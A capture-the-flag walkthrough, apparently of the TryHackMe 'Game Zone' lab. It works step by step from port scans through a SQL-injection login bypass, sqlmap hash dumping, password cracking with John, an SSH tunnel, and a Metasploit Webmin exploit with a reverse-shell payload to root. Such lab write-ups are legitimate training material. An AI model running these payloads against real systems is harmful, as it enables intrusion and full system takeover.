THM - Game Zone
export TARGET=$(target)
Scan:Nmap
nmap -p- -A $TARGET
...
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
...
Scan:gobuster
gobuster dir --url $TARGET -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
SQLi in login form
Login: admin' or 1=1 -- -
SQLMap
sqlmap
-> agent47
-> ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
John
echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
-> videogamer124
SSH into
ssh agent47@$TARGET
-> videogamer124
Running ss to get a list of listening ports
We will use a tool called ss to investigate sockets running on a host. If we run ss -tulpn it will tell us what socket connections are running
Argument | Description |
---|---|
-t | Display TCP sockets |
-u | Display UDP sockets |
-l | Displays only listening sockets |
-p | Shows the process using the socket |
-n | Doesn't resolve service names |
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
ss -tlpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
Port 10000 is not available for us.
we don't have permission to check `cat /etc/iptables/rules.v4
On hacker machine
ssh -L 10000:127.0.0.1:10000 -f -N agent47@$(target)
-> videogamer124
then on hacker machine we can go to http://localhost:10000/
login agent47
password videogamer124
Nmap
nmap -p 10000 -sC -sV -Pn localhost
Metasploit
msf6 > search 1.580
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rhost 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.18.9.175
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
we have root